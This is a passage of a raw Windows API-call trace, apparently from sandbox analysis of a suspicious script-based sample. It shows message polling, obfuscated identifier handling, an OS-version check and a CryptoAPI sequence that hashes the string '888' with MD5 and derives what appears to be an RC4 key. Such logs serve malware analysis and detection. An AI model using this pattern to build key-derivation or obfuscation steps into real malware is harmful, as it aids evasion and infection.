Size=0x10) returned 0x2aa9610 [0090.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0090.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9a3d40 [0090.003] FindClose (in: hFindFile=0x9a3d40 | out: hFindFile=0x9a3d40) returned 1 [0090.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.003] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.003] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.003] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0090.004] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.004] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0090.004] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.004] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0090.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0090.004] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.004] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.004] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.004] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.004] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.004] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.005] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.007] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.007] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.007] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.007] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.007] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.007] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.007] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.007] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.007] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.007] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.007] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.008] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.008] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.008] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.008] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.008] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0090.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.009] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.009] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9d78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.009] CryptHashData (hHash=0x9a3f00, pbData=0x2a71a08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.009] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9ec8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.010] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3f00, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3bc0) returned 1 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.010] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 